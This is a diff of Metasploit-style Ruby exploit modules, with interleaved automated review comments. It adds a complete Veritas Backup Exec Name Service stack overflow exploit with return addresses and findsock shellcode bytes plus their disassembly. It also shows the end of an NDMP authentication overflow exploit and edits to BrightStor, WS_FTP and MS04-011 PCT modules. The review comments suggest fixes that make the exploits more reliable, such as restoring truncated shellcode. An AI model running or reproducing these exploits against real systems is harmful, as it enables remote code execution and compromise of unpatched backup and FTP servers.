# Place our payload early in the request and jump backwards into it
|
||||
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
||||
|
||||
# This offset is required for version 10.0
|
||||
password[3536, 2] = "\xeb\x06"
|
||||
password[3540, 4] = [ target['Rets'][1] ].pack('V')
|
||||
password[3544, 5] = "\xe9" + [-1037].pack('V')
|
||||
|
||||
# This offset is required for version 9.0/9.1
|
||||
password[4524, 2] = "\xeb\x06"
|
||||
password[4528, 4] = [ target['Rets'][0] ].pack('V')
|
||||
password[4532, 5] = "\xe9" + [-2025].pack('V')
|
||||
|
||||
# Create the authentication request
|
||||
auth = [
|
||||
1, # Sequence number
|
||||
Time.now.to_i, # Current time
|
||||
0, # Message type (request)
|
||||
0x901, # Message name (connect_client_auth)
|
||||
0, # Reply sequence number
|
||||
0, # Error status
|
||||
3 # Authentication type
|
||||
].pack('NNNNNNN') +
|
||||
[ username.length ].pack('N') + username +
|
||||
[ password.length ].pack('N') + password +
|
||||
[ 4 ].pack('N')
|
||||
|
||||
print_status("Sending authentication request...")
|
||||
ndmp_send(auth)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
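Review bot: `check` returns `Exploit::CheckCode::Safe` both when the reported version does not match and when `ndmp_info()` returned false, so a host that simply did not answer is reported as not vulnerable; the removed Perl `Check` kept these apart with an 'Unknown' result. Return the framework's unknown code (`Exploit::CheckCode::Unknown`, if this tree defines it) when `info` is false, and keep `Safe` for a host that answered with a non-matching version. Two smaller points: `'DisclosureDate' => ''` is left empty where the sibling NS module supplies a date, and `resp` from `resp = ndmp_recv()` in `exploit` is never read, so the assignment can be dropped or the line reduced to `ndmp_recv()`.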
|
|
@ -0,0 +1,137 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Veritas Backup Exec Name Service Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Veritas Backup
|
||||
Exec Agent Browser service. This vulnerability occurs when a
|
||||
recv() call has a length value too long for the destination
|
||||
stack buffer. By sending an agent name value of 63 bytes or
|
||||
more, we can overwrite the return address of the recv
|
||||
function. Since we only have ~60 bytes of contiguous space
|
||||
for shellcode, a tiny findsock payload is sent which uses a
|
||||
hardcoded IAT address for the recv() function. This payload
|
||||
will then roll the stack back to the beginning of the page,
|
||||
recv() the real shellcode into it, and jump to it. This
|
||||
module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
|
||||
8.6.
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '12418'],
|
||||
[ 'CVE', '2004-1172'],
|
||||
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
|
||||
[ 'MIL', '10'],
|
||||
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'MinNops' => 512,
|
||||
'MinNops' => 512,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
|
||||
},
|
||||
],
|
||||
[
|
||||
'Veritas BE 8.5',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Rets' => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
|
||||
},
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Dec 16 2004',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(6101)
|
||||
], self)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)
|
||||
# The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid
|
||||
# nulls: [0x00401150 -> 0x401150FF]
|
||||
stage_code = "\xfc" * 112
|
||||
stage_read =
|
||||
"\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+
|
||||
"\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+
|
||||
"\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"
|
||||
|
||||
# Configure the IAT for the recv call
|
||||
stage_read[29, 4] = [ target['Rets'][1] ].pack('V')
|
||||
|
||||
# Stuff it all into one request
|
||||
stage_code[2, stage_read.length] = stage_read
|
||||
|
||||
# Create the registration request
|
||||
req =
|
||||
"\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+
|
||||
"1.1.1.1.1.1\x00" + "\xeb\x81"
|
||||
|
||||
print_status("Sending the agent registration request of #{req.length.to_s} bytes...")
|
||||
sock.put(req)
|
||||
|
||||
print_status("Sending the payload stage down the socket...")
|
||||
sock.put(payload.encoded)
|
||||
|
||||
print_status("Waiting for the payload to execute...")
|
||||
select(nil, nil, nil, 2)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
__END__
|
||||
[ findsock stage ]
|
||||
00000000 31F6 xor esi,esi
|
||||
00000002 C1EC0C shr esp,0xc
|
||||
00000005 C1E40C shl esp,0xc
|
||||
00000008 89E7 mov edi,esp
|
||||
0000000A 89FB mov ebx,edi
|
||||
0000000C 6A01 push byte +0x1
|
||||
0000000E 8B7424FE mov esi,[esp-0x2]
|
||||
00000012 31D2 xor edx,edx
|
||||
00000014 52 push edx
|
||||
00000015 42 inc edx
|
||||
00000016 C1E210 shl edx,0x10
|
||||
00000019 52 push edx
|
||||
0000001A 57 push edi
|
||||
0000001B 56 push esi
|
||||
0000001C B8FF501140 mov eax,0x401150ff
|
||||
00000021 C1E808 shr eax,0x8
|
||||
00000024 FF10 call near [eax]
|
||||
00000026 85C0 test eax,eax
|
||||
00000028 7907 jns 0x31
|
||||
0000002A 89DC mov esp,ebx
|
||||
0000002C 4E dec esi
|
||||
0000002D 85F6 test esi,esi
|
||||
0000002F 75E1 jnz 0x12
|
||||
00000031 FFD7 call edi
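Review bot: The `Payload` hash lists `'MinNops' => 512` twice, so the second entry overwrites the first and the `'MaxNops' => 512` setting the removed Perl module carried is lost; the second key should read `'MaxNops' => 512`. The comment above `stage_read` says 51 bytes, but the three literal lines total 48 and stop on the `\x75` opcode, while the disassembly after `__END__` and the removed Perl version both continue with `"\xe1\xff\xd7"` (the `jnz` displacement and `call edi`); the port appears to have dropped that fourth line and should be checked against the listing. Minor: `#{req.length.to_s}` needs no `.to_s` inside interpolation.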
|
|
@ -95,6 +95,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoTcp < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_english(4096)
|
||||
|
||||
# Overwriting the return address works well, but the only register
|
||||
|
|
|
@ -93,6 +93,8 @@ class Exploits::Windows::Brightstor::BrightstorDiscoUdp < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect_udp
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = 'X' * 4096
|
||||
|
||||
# esp @ 971
|
||||
|
|
|
@ -62,6 +62,8 @@ class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::
|
|||
|
||||
def exploit
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# The 'one line' request does not work against Windows 2003
|
||||
1.to(5) { |i|
|
||||
|
||||
|
|
|
@ -72,7 +72,9 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
# The server reverses four bytes starting at offset 0xa5 :0
|
||||
|
||||
# Create the overflow string
|
||||
|
|
|
@ -61,7 +61,7 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
|
|||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
buf = Rex::Text.rand_text_alphanum(8192)
|
||||
buf = Rex::Text.rand_text_alphanumeric(8192)
|
||||
buf[498, 4] = [ 0x7ffd3001 ].pack('V')
|
||||
buf[514, 4] = [ target.ret ].pack('V')
|
||||
buf[518, 4] = [ target.ret ].pack('V')
|
||||
|
|
|
@ -129,7 +129,7 @@ class Exploits::Windows::Ssl::MS04_011_PCT < Msf::Exploit::Remote
|
|||
if (datastore['PROTO'] == 'smtp')
|
||||
greeting = sock.get_once
|
||||
|
||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanum(rand(10)+1)) + "\r\n")
|
||||
sock.put('HELO ' + (Rex::Text.rand_text_alphanumeric(rand(10)+1)) + "\r\n")
|
||||
resp = sock.get_once
|
||||
|
||||
sock.put("STARTTLS\r\n")
|
||||
|
|